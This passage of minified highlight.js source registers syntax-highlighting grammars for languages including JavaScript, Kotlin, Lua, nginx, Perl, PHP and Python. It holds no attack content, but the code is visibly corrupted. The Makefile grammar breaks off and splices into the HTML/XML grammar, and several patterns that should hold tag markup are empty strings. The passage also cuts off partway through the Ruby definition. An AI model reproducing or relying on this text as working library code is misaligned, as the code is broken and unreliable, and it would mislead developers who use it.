")},l={className:"number",variants:[{begin:"\\b(0[bB][01]+)n?"},{begin:"\\b(0[oO][0-7]+)n?"},{begin:t.C_NUMBER_RE+"n?"}],relevance:0},E={className:"subst",begin:"\\$\\{",end:"\\}",keywords:o,contains:[]},d={begin:"html`",end:"",starts:{end:"`",returnEnd:!1,contains:[t.BACKSLASH_ESCAPE,E],subLanguage:"xml"}},g={begin:"css`",end:"",starts:{end:"`",returnEnd:!1,contains:[t.BACKSLASH_ESCAPE,E],subLanguage:"css"}},u={className:"string",begin:"`",end:"`",contains:[t.BACKSLASH_ESCAPE,E]};E.contains=[t.APOS_STRING_MODE,t.QUOTE_STRING_MODE,d,g,u,l,t.REGEXP_MODE];var b=E.contains.concat([{begin:/\(/,end:/\)/,contains:["self"].concat(E.contains,[t.C_BLOCK_COMMENT_MODE,t.C_LINE_COMMENT_MODE])},t.C_BLOCK_COMMENT_MODE,t.C_LINE_COMMENT_MODE]),_={className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,contains:b};return{name:"JavaScript",aliases:["js","jsx","mjs","cjs"],keywords:o,contains:[t.SHEBANG({binary:"node",relevance:5}),{className:"meta",relevance:10,begin:/^\s*['"]use (strict|asm)['"]/},t.APOS_STRING_MODE,t.QUOTE_STRING_MODE,d,g,u,t.C_LINE_COMMENT_MODE,t.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{className:"doctag",begin:"@[A-Za-z]+",contains:[{className:"type",begin:"\\{",end:"\\}",relevance:0},{className:"variable",begin:i+"(?=\\s*(-)|$)",endsParent:!0,relevance:0},{begin:/(?=[^\n])\s/,relevance:0}]}]}),t.C_BLOCK_COMMENT_MODE,l,{begin:r(/[{,\n]\s*/,s(r(/(((\/\/.*)|(\/\*(.|\n)*\*\/))\s*)*/,i+"\\s*:"))),relevance:0,contains:[{className:"attr",begin:i+s("\\s*:"),relevance:0}]},{begin:"("+t.RE_STARTERS_RE+"|\\b(case|return|throw)\\b)\\s*",keywords:"return throw 
case",contains:[t.C_LINE_COMMENT_MODE,t.C_BLOCK_COMMENT_MODE,t.REGEXP_MODE,{className:"function",begin:"(\\([^(]*(\\([^(]*(\\([^(]*\\))?\\))?\\)|"+t.UNDERSCORE_IDENT_RE+")\\s*=>",returnBegin:!0,end:"\\s*=>",contains:[{className:"params",variants:[{begin:t.UNDERSCORE_IDENT_RE},{className:null,begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:o,contains:b}]}]},{begin:/,/,relevance:0},{className:"",begin:/\s/,end:/\s*/,skip:!0},{variants:[{begin:"<>",end:""},{begin:c.begin,end:c.end}],subLanguage:"xml",contains:[{begin:c.begin,end:c.end,skip:!0,contains:["self"]}]}],relevance:0},{className:"function",beginKeywords:"function",end:/\{/,excludeEnd:!0,contains:[t.inherit(t.TITLE_MODE,{begin:i}),_],illegal:/\[|%/},{begin:/\$[(.]/},t.METHOD_GUARD,{className:"class",beginKeywords:"class",end:/[{;=]/,excludeEnd:!0,illegal:/[:"\[\]]/,contains:[{beginKeywords:"extends"},t.UNDERSCORE_TITLE_MODE]},{beginKeywords:"constructor",end:/\{/,excludeEnd:!0},{begin:"(get|set)\\s+(?="+i+"\\()",end:/{/,keywords:"get set",contains:[t.inherit(t.TITLE_MODE,{begin:i}),{begin:/\(\)/},_]}],illegal:/#(?!!)/}}}()); +hljs.registerLanguage("json",function(){"use strict";return function(n){var e={literal:"true false null"},i=[n.C_LINE_COMMENT_MODE,n.C_BLOCK_COMMENT_MODE],t=[n.QUOTE_STRING_MODE,n.C_NUMBER_MODE],a={end:",",endsWithParent:!0,excludeEnd:!0,contains:t,keywords:e},l={begin:"{",end:"}",contains:[{className:"attr",begin:/"/,end:/"/,contains:[n.BACKSLASH_ESCAPE],illegal:"\\n"},n.inherit(a,{begin:/:/})].concat(i),illegal:"\\S"},s={begin:"\\[",end:"\\]",contains:[n.inherit(a)],illegal:"\\S"};return t.push(l,s),i.forEach((function(n){t.push(n)})),{name:"JSON",contains:t,keywords:e,illegal:"\\S"}}}()); +hljs.registerLanguage("kotlin",function(){"use strict";return function(e){var n={keyword:"abstract as val var vararg get set class object open private protected public noinline crossinline dynamic final enum if else do while for when throw try catch finally import 
package is in fun override companion reified inline lateinit init interface annotation data sealed internal infix operator out by constructor super tailrec where const inner suspend typealias external expect actual trait volatile transient native default",built_in:"Byte Short Char Int Long Boolean Float Double Void Unit Nothing",literal:"true false null"},a={className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"@"},i={className:"subst",begin:"\\${",end:"}",contains:[e.C_NUMBER_MODE]},s={className:"variable",begin:"\\$"+e.UNDERSCORE_IDENT_RE},t={className:"string",variants:[{begin:'"""',end:'"""(?=[^"])',contains:[s,i]},{begin:"'",end:"'",illegal:/\n/,contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"',illegal:/\n/,contains:[e.BACKSLASH_ESCAPE,s,i]}]};i.contains.push(t);var r={className:"meta",begin:"@(?:file|property|field|get|set|receiver|param|setparam|delegate)\\s*:(?:\\s*"+e.UNDERSCORE_IDENT_RE+")?"},l={className:"meta",begin:"@"+e.UNDERSCORE_IDENT_RE,contains:[{begin:/\(/,end:/\)/,contains:[e.inherit(t,{className:"meta-string"})]}]},c=e.COMMENT("/\\*","\\*/",{contains:[e.C_BLOCK_COMMENT_MODE]}),o={variants:[{className:"type",begin:e.UNDERSCORE_IDENT_RE},{begin:/\(/,end:/\)/,contains:[]}]},d=o;return 
d.variants[1].contains=[o],o.variants[1].contains=[d],{name:"Kotlin",aliases:["kt"],keywords:n,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{className:"doctag",begin:"@[A-Za-z]+"}]}),e.C_LINE_COMMENT_MODE,c,{className:"keyword",begin:/\b(break|continue|return|this)\b/,starts:{contains:[{className:"symbol",begin:/@\w+/}]}},a,r,l,{className:"function",beginKeywords:"fun",end:"[(]|$",returnBegin:!0,excludeEnd:!0,keywords:n,illegal:/fun\s+(<.*>)?[^\s\(]+(\s+[^\s\(]+)\s*=/,relevance:5,contains:[{begin:e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,relevance:0,contains:[e.UNDERSCORE_TITLE_MODE]},{className:"type",begin://,keywords:"reified",relevance:0},{className:"params",begin:/\(/,end:/\)/,endsParent:!0,keywords:n,relevance:0,contains:[{begin:/:/,end:/[=,\/]/,endsWithParent:!0,contains:[o,e.C_LINE_COMMENT_MODE,c],relevance:0},e.C_LINE_COMMENT_MODE,c,r,l,t,e.C_NUMBER_MODE]},c]},{className:"class",beginKeywords:"class interface trait",end:/[:\{(]|$/,excludeEnd:!0,illegal:"extends implements",contains:[{beginKeywords:"public protected internal private constructor"},e.UNDERSCORE_TITLE_MODE,{className:"type",begin://,excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:/[,:]\s*/,end:/[<\(,]|$/,excludeBegin:!0,returnEnd:!0},r,l]},t,{className:"meta",begin:"^#!/usr/bin/env",end:"$",illegal:"\n"},{className:"number",begin:"\\b(0[bB]([01]+[01_]+[01]+|[01]+)|0[xX]([a-fA-F0-9]+[a-fA-F0-9_]+[a-fA-F0-9]+|[a-fA-F0-9]+)|(([\\d]+[\\d_]+[\\d]+|[\\d]+)(\\.([\\d]+[\\d_]+[\\d]+|[\\d]+))?|\\.([\\d]+[\\d_]+[\\d]+|[\\d]+))([eE][-+]?\\d+)?)[lLfF]?",relevance:0}]}}}()); +hljs.registerLanguage("less",function(){"use strict";return function(e){var 
n="([\\w-]+|@{[\\w-]+})",a=[],s=[],t=function(e){return{className:"string",begin:"~?"+e+".*?"+e}},r=function(e,n,a){return{className:e,begin:n,relevance:a}},i={begin:"\\(",end:"\\)",contains:s,relevance:0};s.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,t("'"),t('"'),e.CSS_NUMBER_MODE,{begin:"(url|data-uri)\\(",starts:{className:"string",end:"[\\)\\n]",excludeEnd:!0}},r("number","#[0-9A-Fa-f]+\\b"),i,r("variable","@@?[\\w-]+",10),r("variable","@{[\\w-]+}"),r("built_in","~?`[^`]*?`"),{className:"attribute",begin:"[\\w-]+\\s*:",end:":",returnBegin:!0,excludeEnd:!0},{className:"meta",begin:"!important"});var c=s.concat({begin:"{",end:"}",contains:a}),l={beginKeywords:"when",endsWithParent:!0,contains:[{beginKeywords:"and not"}].concat(s)},o={begin:n+"\\s*:",returnBegin:!0,end:"[;}]",relevance:0,contains:[{className:"attribute",begin:n,end:":",excludeEnd:!0,starts:{endsWithParent:!0,illegal:"[<=$]",relevance:0,contains:s}}]},g={className:"keyword",begin:"@(import|media|charset|font-face|(-[a-z]+-)?keyframes|supports|document|namespace|page|viewport|host)\\b",starts:{end:"[;{}]",returnEnd:!0,contains:s,relevance:0}},d={className:"variable",variants:[{begin:"@[\\w-]+\\s*:",relevance:15},{begin:"@[\\w-]+"}],starts:{end:"[;}]",returnEnd:!0,contains:c}},b={variants:[{begin:"[\\.#:&\\[>]",end:"[;{}]"},{begin:n,end:"{"}],returnBegin:!0,returnEnd:!0,illegal:"[<='$\"]",relevance:0,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,l,r("keyword","all\\b"),r("variable","@{[\\w-]+}"),r("selector-tag",n+"%?",0),r("selector-id","#"+n),r("selector-class","\\."+n,0),r("selector-tag","&",0),{className:"selector-attr",begin:"\\[",end:"\\]"},{className:"selector-pseudo",begin:/:(:)?[a-zA-Z0-9\_\-\+\(\)"'.]+/},{begin:"\\(",end:"\\)",contains:c},{begin:"!important"}]};return a.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,g,d,o,b),{name:"Less",case_insensitive:!0,illegal:"[=>'/<($\"]",contains:a}}}()); +hljs.registerLanguage("lua",function(){"use strict";return function(e){var 
t={begin:"\\[=*\\[",end:"\\]=*\\]",contains:["self"]},a=[e.COMMENT("--(?!\\[=*\\[)","$"),e.COMMENT("--\\[=*\\[","\\]=*\\]",{contains:[t],relevance:10})];return{name:"Lua",keywords:{$pattern:e.UNDERSCORE_IDENT_RE,literal:"true false nil",keyword:"and break do else elseif end for goto if in local not or repeat return then until while",built_in:"_G _ENV _VERSION __index __newindex __mode __call __metatable __tostring __len __gc __add __sub __mul __div __mod __pow __concat __unm __eq __lt __le assert collectgarbage dofile error getfenv getmetatable ipairs load loadfile loadstring module next pairs pcall print rawequal rawget rawset require select setfenv setmetatable tonumber tostring type unpack xpcall arg self coroutine resume yield status wrap create running debug getupvalue debug sethook getmetatable gethook setmetatable setlocal traceback setfenv getinfo setupvalue getlocal getregistry getfenv io lines write close flush open output type read stderr stdin input stdout popen tmpfile math log max acos huge ldexp pi cos tanh pow deg tan cosh sinh random randomseed frexp ceil floor rad abs sqrt modf asin min mod fmod log10 atan2 exp sin atan os exit setlocale date getenv difftime remove time clock tmpname rename execute package preload loadlib loaded loaders cpath config path seeall string sub upper len gfind rep find match char dump gmatch reverse byte format gsub lower table setn insert getn foreachi maxn foreach concat sort remove"},contains:a.concat([{className:"function",beginKeywords:"function",end:"\\)",contains:[e.inherit(e.TITLE_MODE,{begin:"([_a-zA-Z]\\w*\\.)*([_a-zA-Z]\\w*:)?[_a-zA-Z]\\w*"}),{className:"params",begin:"\\(",endsWithParent:!0,contains:a}].concat(a)},e.C_NUMBER_MODE,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{className:"string",begin:"\\[=*\\[",end:"\\]=*\\]",contains:[t],relevance:5}])}}}()); +hljs.registerLanguage("makefile",function(){"use strict";return function(e){var 
i={className:"variable",variants:[{begin:"\\$\\("+e.UNDERSCORE_IDENT_RE+"\\)",contains:[e.BACKSLASH_ESCAPE]},{begin:/\$[@%`]+/}]}]}]};return{name:"HTML, XML",aliases:["html","xhtml","rss","atom","xjb","xsd","xsl","plist","wsf","svg"],case_insensitive:!0,contains:[{className:"meta",begin:"",relevance:10,contains:[a,i,t,s,{begin:"\\[",end:"\\]",contains:[{className:"meta",begin:"",contains:[a,s,i,t]}]}]},e.COMMENT("\x3c!--","--\x3e",{relevance:10}),{begin:"<\\!\\[CDATA\\[",end:"\\]\\]>",relevance:10},n,{className:"meta",begin:/<\?xml/,end:/\?>/,relevance:10},{className:"tag",begin:")",end:">",keywords:{name:"style"},contains:[c],starts:{end:"",returnEnd:!0,subLanguage:["css","xml"]}},{className:"tag",begin:")",end:">",keywords:{name:"script"},contains:[c],starts:{end:"<\/script>",returnEnd:!0,subLanguage:["javascript","handlebars","xml"]}},{className:"tag",begin:"",contains:[{className:"name",begin:/[^\/><\s]+/,relevance:0},c]}]}}}()); +hljs.registerLanguage("markdown",function(){"use strict";return function(n){const e={begin:"<",end:">",subLanguage:"xml",relevance:0},a={begin:"\\[.+?\\][\\(\\[].*?[\\)\\]]",returnBegin:!0,contains:[{className:"string",begin:"\\[",end:"\\]",excludeBegin:!0,returnEnd:!0,relevance:0},{className:"link",begin:"\\]\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0},{className:"symbol",begin:"\\]\\[",end:"\\]",excludeBegin:!0,excludeEnd:!0}],relevance:10},i={className:"strong",contains:[],variants:[{begin:/_{2}/,end:/_{2}/},{begin:/\*{2}/,end:/\*{2}/}]},s={className:"emphasis",contains:[],variants:[{begin:/\*(?!\*)/,end:/\*/},{begin:/_(?!_)/,end:/_/,relevance:0}]};i.contains.push(s),s.contains.push(i);var c=[e,a];return i.contains=i.contains.concat(c),s.contains=s.contains.concat(c),{name:"Markdown",aliases:["md","mkdown","mkd"],contains:[{className:"section",variants:[{begin:"^#{1,6}",end:"$",contains:c=c.concat(i,s)},{begin:"(?=^.+?\\n[=-]{2,}$)",contains:[{begin:"^[=-]*$"},{begin:"^",end:"\\n",contains:c}]}]},e,{className:"bullet",begin:"^[ 
\t]*([*+-]|(\\d+\\.))(?=\\s+)",end:"\\s+",excludeEnd:!0},i,s,{className:"quote",begin:"^>\\s+",contains:c,end:"$"},{className:"code",variants:[{begin:"(`{3,})(.|\\n)*?\\1`*[ ]*"},{begin:"(~{3,})(.|\\n)*?\\1~*[ ]*"},{begin:"```",end:"```+[ ]*$"},{begin:"~~~",end:"~~~+[ ]*$"},{begin:"`.+?`"},{begin:"(?=^( {4}|\\t))",contains:[{begin:"^( {4}|\\t)",end:"(\\n)$"}],relevance:0}]},{begin:"^[-\\*]{3,}",end:"$"},a,{begin:/^\[[^\n]+\]:/,returnBegin:!0,contains:[{className:"symbol",begin:/\[/,end:/\]/,excludeBegin:!0,excludeEnd:!0},{className:"link",begin:/:\s*/,end:/$/,excludeBegin:!0}]}]}}}()); +hljs.registerLanguage("nginx",function(){"use strict";return function(e){var n={className:"variable",variants:[{begin:/\$\d+/},{begin:/\$\{/,end:/}/},{begin:"[\\$\\@]"+e.UNDERSCORE_IDENT_RE}]},a={endsWithParent:!0,keywords:{$pattern:"[a-z/_]+",literal:"on off yes no true false none blocked debug info notice warn error crit select break last permanent redirect kqueue rtsig epoll poll /dev/poll"},relevance:0,illegal:"=>",contains:[e.HASH_COMMENT_MODE,{className:"string",contains:[e.BACKSLASH_ESCAPE,n],variants:[{begin:/"/,end:/"/},{begin:/'/,end:/'/}]},{begin:"([a-z]+):/",end:"\\s",endsWithParent:!0,excludeEnd:!0,contains:[n]},{className:"regexp",contains:[e.BACKSLASH_ESCAPE,n],variants:[{begin:"\\s\\^",end:"\\s|{|;",returnEnd:!0},{begin:"~\\*?\\s+",end:"\\s|{|;",returnEnd:!0},{begin:"\\*(\\.[a-z\\-]+)+"},{begin:"([a-z\\-]+\\.)+\\*"}]},{className:"number",begin:"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}(:\\d{1,5})?\\b"},{className:"number",begin:"\\b\\d+[kKmMgGdshdwy]*\\b",relevance:0},n]};return{name:"Nginx config",aliases:["nginxconf"],contains:[e.HASH_COMMENT_MODE,{begin:e.UNDERSCORE_IDENT_RE+"\\s+{",returnBegin:!0,end:"{",contains:[{className:"section",begin:e.UNDERSCORE_IDENT_RE}],relevance:0},{begin:e.UNDERSCORE_IDENT_RE+"\\s",end:";|{",returnBegin:!0,contains:[{className:"attribute",begin:e.UNDERSCORE_IDENT_RE,starts:a}],relevance:0}],illegal:"[^\\s\\}]"}}}()); 
+hljs.registerLanguage("objectivec",function(){"use strict";return function(e){var n=/[a-zA-Z@][a-zA-Z0-9_]*/,_={$pattern:n,keyword:"@interface @class @protocol @implementation"};return{name:"Objective-C",aliases:["mm","objc","obj-c"],keywords:{$pattern:n,keyword:"int float while char export sizeof typedef const struct for union unsigned long volatile static bool mutable if do return goto void enum else break extern asm case short default double register explicit signed typename this switch continue wchar_t inline readonly assign readwrite self @synchronized id typeof nonatomic super unichar IBOutlet IBAction strong weak copy in out inout bycopy byref oneway __strong __weak __block __autoreleasing @private @protected @public @try @property @end @throw @catch @finally @autoreleasepool @synthesize @dynamic @selector @optional @required @encode @package @import @defs @compatibility_alias __bridge __bridge_transfer __bridge_retained __bridge_retain __covariant __contravariant __kindof _Nonnull _Nullable _Null_unspecified __FUNCTION__ __PRETTY_FUNCTION__ __attribute__ getter setter retain unsafe_unretained nonnull nullable null_unspecified null_resettable class instancetype NS_DESIGNATED_INITIALIZER NS_UNAVAILABLE NS_REQUIRES_SUPER NS_RETURNS_INNER_POINTER NS_INLINE NS_AVAILABLE NS_DEPRECATED NS_ENUM NS_OPTIONS NS_SWIFT_UNAVAILABLE NS_ASSUME_NONNULL_BEGIN NS_ASSUME_NONNULL_END NS_REFINED_FOR_SWIFT NS_SWIFT_NAME NS_SWIFT_NOTHROW NS_DURING NS_HANDLER NS_ENDHANDLER NS_VALUERETURN NS_VOIDRETURN",literal:"false true FALSE TRUE nil YES NO NULL",built_in:"BOOL dispatch_once_t dispatch_queue_t dispatch_sync dispatch_async dispatch_once"},illegal:"/,end:/$/,illegal:"\\n"},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{className:"class",begin:"("+_.keyword.split(" ").join("|")+")\\b",end:"({|$)",excludeEnd:!0,keywords:_,contains:[e.UNDERSCORE_TITLE_MODE]},{begin:"\\."+e.UNDERSCORE_IDENT_RE,relevance:0}]}}}()); +hljs.registerLanguage("perl",function(){"use strict";return 
function(e){var n={$pattern:/[\w.]+/,keyword:"getpwent getservent quotemeta msgrcv scalar kill dbmclose undef lc ma syswrite tr send umask sysopen shmwrite vec qx utime local oct semctl localtime readpipe do return format read sprintf dbmopen pop getpgrp not getpwnam rewinddir qq fileno qw endprotoent wait sethostent bless s|0 opendir continue each sleep endgrent shutdown dump chomp connect getsockname die socketpair close flock exists index shmget sub for endpwent redo lstat msgctl setpgrp abs exit select print ref gethostbyaddr unshift fcntl syscall goto getnetbyaddr join gmtime symlink semget splice x|0 getpeername recv log setsockopt cos last reverse gethostbyname getgrnam study formline endhostent times chop length gethostent getnetent pack getprotoent getservbyname rand mkdir pos chmod y|0 substr endnetent printf next open msgsnd readdir use unlink getsockopt getpriority rindex wantarray hex system getservbyport endservent int chr untie rmdir prototype tell listen fork shmread ucfirst setprotoent else sysseek link getgrgid shmctl waitpid unpack getnetbyname reset chdir grep split require caller lcfirst until warn while values shift telldir getpwuid my getprotobynumber delete and sort uc defined srand accept package seekdir getprotobyname semop our rename seek if q|0 chroot sysread setpwent no crypt getc chown sqrt write setnetent setpriority foreach tie sin msgget map stat getlogin unless elsif truncate exec keys glob tied closedir ioctl socket readlink eval xor readline binmode setservent eof ord bind alarm pipe atan2 getgrent exp time push setgrent gt lt or ne m|0 break given say state 
when"},t={className:"subst",begin:"[$@]\\{",end:"\\}",keywords:n},s={begin:"->{",end:"}"},r={variants:[{begin:/\$\d/},{begin:/[\$%@](\^\w\b|#\w+(::\w+)*|{\w+}|\w+(::\w*)*)/},{begin:/[\$%@][^\s\w{]/,relevance:0}]},i=[e.BACKSLASH_ESCAPE,t,r],a=[r,e.HASH_COMMENT_MODE,e.COMMENT("^\\=\\w","\\=cut",{endsWithParent:!0}),s,{className:"string",contains:i,variants:[{begin:"q[qwxr]?\\s*\\(",end:"\\)",relevance:5},{begin:"q[qwxr]?\\s*\\[",end:"\\]",relevance:5},{begin:"q[qwxr]?\\s*\\{",end:"\\}",relevance:5},{begin:"q[qwxr]?\\s*\\|",end:"\\|",relevance:5},{begin:"q[qwxr]?\\s*\\<",end:"\\>",relevance:5},{begin:"qw\\s+q",end:"q",relevance:5},{begin:"'",end:"'",contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"'},{begin:"`",end:"`",contains:[e.BACKSLASH_ESCAPE]},{begin:"{\\w+}",contains:[],relevance:0},{begin:"-?\\w+\\s*\\=\\>",contains:[],relevance:0}]},{className:"number",begin:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",relevance:0},{begin:"(\\/\\/|"+e.RE_STARTERS_RE+"|\\b(split|return|print|reverse|grep)\\b)\\s*",keywords:"split return print reverse grep",relevance:0,contains:[e.HASH_COMMENT_MODE,{className:"regexp",begin:"(s|tr|y)/(\\\\.|[^/])*/(\\\\.|[^/])*/[a-z]*",relevance:10},{className:"regexp",begin:"(m|qr)?/",end:"/[a-z]*",contains:[e.BACKSLASH_ESCAPE],relevance:0}]},{className:"function",beginKeywords:"sub",end:"(\\s*\\(.*?\\))?[;{]",excludeEnd:!0,relevance:5,contains:[e.TITLE_MODE]},{begin:"-\\w\\b",relevance:0},{begin:"^__DATA__$",end:"^__END__$",subLanguage:"mojolicious",contains:[{begin:"^@@.*",end:"$",className:"comment"}]}];return t.contains=a,s.contains=a,{name:"Perl",aliases:["pl","pm"],keywords:n,contains:a}}}()); +hljs.registerLanguage("php",function(){"use strict";return function(e){var 
r={begin:"\\$+[a-zA-Z_-ÿ][a-zA-Z0-9_-ÿ]*"},t={className:"meta",variants:[{begin:/<\?php/,relevance:10},{begin:/<\?[=]?/},{begin:/\?>/}]},a={className:"string",contains:[e.BACKSLASH_ESCAPE,t],variants:[{begin:'b"',end:'"'},{begin:"b'",end:"'"},e.inherit(e.APOS_STRING_MODE,{illegal:null}),e.inherit(e.QUOTE_STRING_MODE,{illegal:null})]},n={variants:[e.BINARY_NUMBER_MODE,e.C_NUMBER_MODE]},i={keyword:"__CLASS__ __DIR__ __FILE__ __FUNCTION__ __LINE__ __METHOD__ __NAMESPACE__ __TRAIT__ die echo exit include include_once print require require_once array abstract and as binary bool boolean break callable case catch class clone const continue declare default do double else elseif empty enddeclare endfor endforeach endif endswitch endwhile eval extends final finally float for foreach from global goto if implements instanceof insteadof int integer interface isset iterable list new object or private protected public real return string switch throw trait try unset use var void while xor yield",literal:"false null true",built_in:"Error|0 AppendIterator ArgumentCountError ArithmeticError ArrayIterator ArrayObject AssertionError BadFunctionCallException BadMethodCallException CachingIterator CallbackFilterIterator CompileError Countable DirectoryIterator DivisionByZeroError DomainException EmptyIterator ErrorException Exception FilesystemIterator FilterIterator GlobIterator InfiniteIterator InvalidArgumentException IteratorIterator LengthException LimitIterator LogicException MultipleIterator NoRewindIterator OutOfBoundsException OutOfRangeException OuterIterator OverflowException ParentIterator ParseError RangeException RecursiveArrayIterator RecursiveCachingIterator RecursiveCallbackFilterIterator RecursiveDirectoryIterator RecursiveFilterIterator RecursiveIterator RecursiveIteratorIterator RecursiveRegexIterator RecursiveTreeIterator RegexIterator RuntimeException SeekableIterator SplDoublyLinkedList SplFileInfo SplFileObject SplFixedArray SplHeap SplMaxHeap SplMinHeap 
SplObjectStorage SplObserver SplObserver SplPriorityQueue SplQueue SplStack SplSubject SplSubject SplTempFileObject TypeError UnderflowException UnexpectedValueException ArrayAccess Closure Generator Iterator IteratorAggregate Serializable Throwable Traversable WeakReference Directory __PHP_Incomplete_Class parent php_user_filter self static stdClass"};return{aliases:["php","php3","php4","php5","php6","php7"],case_insensitive:!0,keywords:i,contains:[e.HASH_COMMENT_MODE,e.COMMENT("//","$",{contains:[t]}),e.COMMENT("/\\*","\\*/",{contains:[{className:"doctag",begin:"@[A-Za-z]+"}]}),e.COMMENT("__halt_compiler.+?;",!1,{endsWithParent:!0,keywords:"__halt_compiler"}),{className:"string",begin:/<<<['"]?\w+['"]?$/,end:/^\w+;?$/,contains:[e.BACKSLASH_ESCAPE,{className:"subst",variants:[{begin:/\$\w+/},{begin:/\{\$/,end:/\}/}]}]},t,{className:"keyword",begin:/\$this\b/},r,{begin:/(::|->)+[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/},{className:"function",beginKeywords:"fn function",end:/[;{]/,excludeEnd:!0,illegal:"[$%\\[]",contains:[e.UNDERSCORE_TITLE_MODE,{className:"params",begin:"\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0,keywords:i,contains:["self",r,e.C_BLOCK_COMMENT_MODE,a,n]}]},{className:"class",beginKeywords:"class interface",end:"{",excludeEnd:!0,illegal:/[:\(\$"]/,contains:[{beginKeywords:"extends implements"},e.UNDERSCORE_TITLE_MODE]},{beginKeywords:"namespace",end:";",illegal:/[\.']/,contains:[e.UNDERSCORE_TITLE_MODE]},{beginKeywords:"use",end:";",contains:[e.UNDERSCORE_TITLE_MODE]},{begin:"=>"},a,n]}}}()); +hljs.registerLanguage("php-template",function(){"use strict";return function(n){return{name:"PHP template",subLanguage:"xml",contains:[{begin:/<\?(php|=)?/,end:/\?>/,subLanguage:"php",contains:[{begin:"/\\*",end:"\\*/",skip:!0},{begin:'b"',end:'"',skip:!0},{begin:"b'",end:"'",skip:!0},n.inherit(n.APOS_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0}),n.inherit(n.QUOTE_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0})]}]}}}()); 
+hljs.registerLanguage("plaintext",function(){"use strict";return function(t){return{name:"Plain text",aliases:["text","txt"],disableAutodetect:!0}}}()); +hljs.registerLanguage("properties",function(){"use strict";return function(e){var n="[ \\t\\f]*",t="("+n+"[:=]"+n+"|[ \\t\\f]+)",a="([^\\\\:= \\t\\f\\n]|\\\\.)+",s={end:t,relevance:0,starts:{className:"string",end:/$/,relevance:0,contains:[{begin:"\\\\\\n"}]}};return{name:".properties",case_insensitive:!0,illegal:/\S/,contains:[e.COMMENT("^\\s*[!#]","$"),{begin:"([^\\\\\\W:= \\t\\f\\n]|\\\\.)+"+t,returnBegin:!0,contains:[{className:"attr",begin:"([^\\\\\\W:= \\t\\f\\n]|\\\\.)+",endsParent:!0,relevance:0}],starts:s},{begin:a+t,returnBegin:!0,relevance:0,contains:[{className:"meta",begin:a,endsParent:!0,relevance:0}],starts:s},{className:"attr",relevance:0,begin:a+n+"$"}]}}}()); +hljs.registerLanguage("python",function(){"use strict";return function(e){var n={keyword:"and elif is global as in if from raise for except finally print import pass return exec else break not with class assert yield try while continue del or def lambda async await nonlocal|10",built_in:"Ellipsis NotImplemented",literal:"False None True"},a={className:"meta",begin:/^(>>>|\.\.\.) 
/},i={className:"subst",begin:/\{/,end:/\}/,keywords:n,illegal:/#/},s={begin:/\{\{/,relevance:0},r={className:"string",contains:[e.BACKSLASH_ESCAPE],variants:[{begin:/(u|b)?r?'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,a],relevance:10},{begin:/(u|b)?r?"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,a],relevance:10},{begin:/(fr|rf|f)'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,a,s,i]},{begin:/(fr|rf|f)"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,a,s,i]},{begin:/(u|r|ur)'/,end:/'/,relevance:10},{begin:/(u|r|ur)"/,end:/"/,relevance:10},{begin:/(b|br)'/,end:/'/},{begin:/(b|br)"/,end:/"/},{begin:/(fr|rf|f)'/,end:/'/,contains:[e.BACKSLASH_ESCAPE,s,i]},{begin:/(fr|rf|f)"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,s,i]},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},l={className:"number",relevance:0,variants:[{begin:e.BINARY_NUMBER_RE+"[lLjJ]?"},{begin:"\\b(0o[0-7]+)[lLjJ]?"},{begin:e.C_NUMBER_RE+"[lLjJ]?"}]},t={className:"params",variants:[{begin:/\(\s*\)/,skip:!0,className:null},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,contains:["self",a,l,r,e.HASH_COMMENT_MODE]}]};return i.contains=[r,l,a],{name:"Python",aliases:["py","gyp","ipython"],keywords:n,illegal:/(<\/|->|\?)|=>/,contains:[a,l,{beginKeywords:"if",relevance:0},r,e.HASH_COMMENT_MODE,{variants:[{className:"function",beginKeywords:"def"},{className:"class",beginKeywords:"class"}],end:/:/,illegal:/[${=;\n,]/,contains:[e.UNDERSCORE_TITLE_MODE,t,{begin:/->/,endsWithParent:!0,keywords:"None"}]},{className:"meta",begin:/^[\t ]*@/,end:/$/},{begin:/\b(print|exec)\(/}]}}}()); +hljs.registerLanguage("python-repl",function(){"use strict";return function(n){return{aliases:["pycon"],contains:[{className:"meta",starts:{end:/ |$/,starts:{end:"$",subLanguage:"python"}},variants:[{begin:/^>>>(?=[ ]|$)/},{begin:/^\.\.\.(?=[ ]|$)/}]}]}}}()); +hljs.registerLanguage("ruby",function(){"use strict";return function(e){var n="[a-zA-Z_]\\w*[!?=]?|[-+~]\\@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?",a={keyword:"and then defined module in 
